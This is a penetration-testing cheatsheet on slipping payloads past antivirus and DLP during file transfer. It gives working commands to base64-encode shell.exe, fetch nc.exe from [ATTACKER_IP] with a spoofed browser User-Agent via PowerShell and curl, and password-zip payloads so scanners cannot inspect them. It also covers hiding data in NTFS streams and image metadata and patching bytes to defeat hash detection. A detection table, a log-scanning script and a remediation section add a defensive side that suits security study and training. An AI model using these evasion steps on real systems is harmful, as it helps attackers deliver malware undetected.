🛡️ Methodology Checklist
- Identify AV/EDR presence on target
- Rename binaries to benign names before transfer
- Encode payload: base64 encode on attacker, decode on target
- Split file into chunks if size limits apply
- Use alternate data streams (ADS) on NTFS to hide files
- Transfer via DNS (dnscat2) or ICMP if HTTP/SMB blocked
- Verify AV does not flag transferred file before execution
🎯 Operational Context
Use when: AV or DLP is scanning transfers and detecting payloads → encode, split, rename, or compress to bypass content inspection.
Think Dumber First: Base64 encoding changes every byte of the file's static signature without altering its functionality. `base64 shell.exe | tr -d '\n' > shell.b64` → transfer the text → `base64 -d shell.b64 > shell.exe`. Works against most static content inspection.
Skip when: Target has behavioral EDR. Encoding only bypasses static/signature inspection, not behavioral detection.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| `Invoke-WebRequest http://[TARGET_IP]/nc.exe -OutFile nc.exe` | Default IWR; leaves the PowerShell UA in logs |
| `[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() \| Select-Object Name,@{label="UA";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} \| fl` | List built-in PowerShell UA strings |
| `$UA=[Microsoft.PowerShell.Commands.PSUserAgent]::Chrome; Invoke-WebRequest http://[TARGET_IP]/nc.exe -UserAgent $UA -OutFile nc.exe` | Download while impersonating Chrome |
| `Invoke-WebRequest http://[TARGET_IP]/nc.exe -UserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/91.0.4472.124 Safari/537.36" -OutFile nc.exe` | Hardcoded Chrome UA string |
| `curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/91.0.4472.124 Safari/537.36" http://[TARGET_IP]/nc.exe -o nc.exe` | cURL download with Chrome UA |
| `GfxDownloadWrapper.exe "http://[TARGET_IP]/file.exe" "C:\Temp\file.exe"` | Intel GPU driver binary; minimal logging |
🔬 Deep Dive & Workflow
How Blue Teams Detect File Transfers
Network-based detection is more robust than command-line logging, which is easily bypassed with obfuscation. SIEMs and NDR tools inspect HTTP User-Agent headers, and many LOL binaries have hardcoded, distinctive UAs.
Known User-Agent Signatures (What Blue Teams See)
| Tool | User-Agent String | Detection Risk |
|---|---|---|
| PowerShell Invoke-WebRequest | `Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.0` | High: trivially identified |
| WinHttp COM object | `Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)` | Medium |
| Msxml2 XMLHTTP COM | `Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0)` | Medium: IE7 traffic is suspicious in modern environments |
| certutil.exe | `Microsoft-CryptoAPI/10.0` | Critical: actively hunted |
| BITS | `Microsoft BITS/7.8` | Medium: rare for user-initiated transfers |
| curl default | `curl/7.x.x` | High: non-human UA |
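The detection side of the table above, as an added example (not code from the original page): a small proxy-log scanner that flags the tooling User-Agents listed, plus one extra heuristic that does not depend on the UA at all, since a spoofed browser UA defeats UA matching. The log format, the `BARE_IP_EXE` heuristic and the sample lines are assumptions constructed for the example.

```python
import re

# Known tooling User-Agent signatures from the table above, with the page's risk rating.
# Each pattern is anchored on the stable part of the string so version suffixes still match.
UA_SIGNATURES = [
    (re.compile(r"WindowsPowerShell/"),         "PowerShell Invoke-WebRequest", "High"),
    (re.compile(r"WinHttp\.WinHttpRequest\.5"), "WinHttp COM object",           "Medium"),
    (re.compile(r"MSIE 7\.0;.*Trident/7\.0"),   "Msxml2 XMLHTTP COM",           "Medium"),
    (re.compile(r"^Microsoft-CryptoAPI/"),      "certutil.exe",                 "Critical"),
    (re.compile(r"^Microsoft BITS/"),           "BITS",                         "Medium"),
    (re.compile(r"^curl/"),                     "curl default",                 "High"),
]

# Hypothetical proxy log format (assumption): <timestamp> <client_ip> <method> <url> "<user-agent>"
LOG_LINE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')
# UA-independent heuristic (assumption): an executable fetched from a bare-IP host is worth
# a look even when the UA looks like a normal browser, because the UA can be spoofed.
BARE_IP_EXE = re.compile(r"^https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/[^?]*\.(?:exe|dll|ps1)$", re.I)

def classify_ua(ua):
    """Return (tool, risk) for a known tooling UA, or None for browser-like/unknown UAs."""
    for pattern, tool, risk in UA_SIGNATURES:
        if pattern.search(ua):
            return tool, risk
    return None

def scan_log(text):
    """Parse proxy log lines and return one finding dict per suspicious request, in log order."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line.strip())
        if not m:
            continue  # skip lines that do not match the assumed format
        ts, src, method, url, ua = m.groups()
        hit = classify_ua(ua)
        if hit:
            findings.append({"ts": ts, "src": src, "url": url, "tool": hit[0], "risk": hit[1]})
        elif BARE_IP_EXE.match(url):
            findings.append({"ts": ts, "src": src, "url": url, "tool": "browser UA (unverified)", "risk": "Review"})
    return findings

# Constructed sample log (not real traffic); hosts use RFC 5737 documentation ranges.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 10.0.0.5 GET http://198.51.100.7/nc.exe "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.0"
2024-05-01T10:00:02Z 10.0.0.5 GET http://198.51.100.7/nc.exe "Microsoft-CryptoAPI/10.0"
2024-05-01T10:00:03Z 10.0.0.9 GET https://www.example.com/index.html "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
2024-05-01T10:00:04Z 10.0.0.5 GET http://198.51.100.7/nc.exe "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
2024-05-01T10:00:05Z 10.0.0.12 GET http://203.0.113.4/update.exe "curl/7.88.1"
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} -> {f['url']}  [{f['tool']}: {f['risk']}]")
```

The fourth sample line is the spoofed-Chrome download from the cheatsheet: UA matching alone misses it, while the bare-IP executable heuristic still surfaces it for review.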
Spoofing the User-Agent (PowerShell)
```powershell
# Option 1: Use built-in PSUserAgent class
$UA = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome
Invoke-WebRequest http://[ATTACKER_IP]/nc.exe -UserAgent $UA -OutFile nc.exe

# Option 2: Hardcode a real browser string
$UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
Invoke-WebRequest http://[ATTACKER_IP]/nc.exe -UserAgent $UA -OutFile nc.exe
```
Blue Team impact: SIEM filters often exclude "standard" browser UAs to reduce noise. Your download blends in with normal web browsing.
Spoofing the User-Agent (cURL)
```bash
curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/91.0.4472.124 Safari/537.36" http://[ATTACKER_IP]/nc.exe -o nc.exe
```
Evasion Decision Tree
- Transfer fails immediately? → Check if the UA is being filtered; try spoofing
- certutil flagged? → Can't change its UA; switch to BITSAdmin or Extrac32
- BITS transfer? → Rare for users to initiate to external IPs; only use if stealth is needed and the target is monitoring UAs carefully
- Maximum stealth required? → Use GfxDownloadWrapper (Intel driver binary) or a WinRM PSSession (no HTTP at all)
LOLBAS Binaries That Cannot Spoof UA
certutil, BITSAdmin, and BITS have hardcoded User-Agent strings and cannot be changed. Avoid these in high-security environments. Prefer Invoke-WebRequest with a spoofed UA or WinRM-based transfers.
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Base64 transfer gets flagged | Pattern-based detection, not content inspection | Try: encrypt with `openssl enc`, then transfer; or split into multiple small files |
| Renamed payload detected | Hash-based detection | Patch a few bytes in the payload; recompile if source is available; use a custom encoder |
| Compressed archive detected | AV scans inside archives | Password-protect the zip: `zip -e -P password shell.zip shell.exe` → AV can't scan encrypted archives |
| Chunked file transfer reassembly fails | Part files corrupt | Verify with `md5sum part_*` on both sides; reassemble with `cat part_* > reassembled`, not `copy` |
| Steganography tool not available on target | No steg tooling | Put the data in image metadata: `exiftool -Comment='[BASE64_PAYLOAD]' image.jpg`; extract on target |
📋 Reporting Trigger
Finding Title: Payload Encoding and Obfuscation Bypasses Content Inspection
Impact: Encoded or compressed payloads evade AV signature detection and DLP content inspection during file transfer, allowing malicious content to reach target systems undetected.
Root Cause: Security controls rely on static content signatures rather than behavioral analysis. Encoded payloads have no matching signatures.
Recommendation: Implement behavioral EDR that detects post-decode execution regardless of transfer encoding. Deploy sandbox detonation for unknown files. Apply file reputation checks at the perimeter.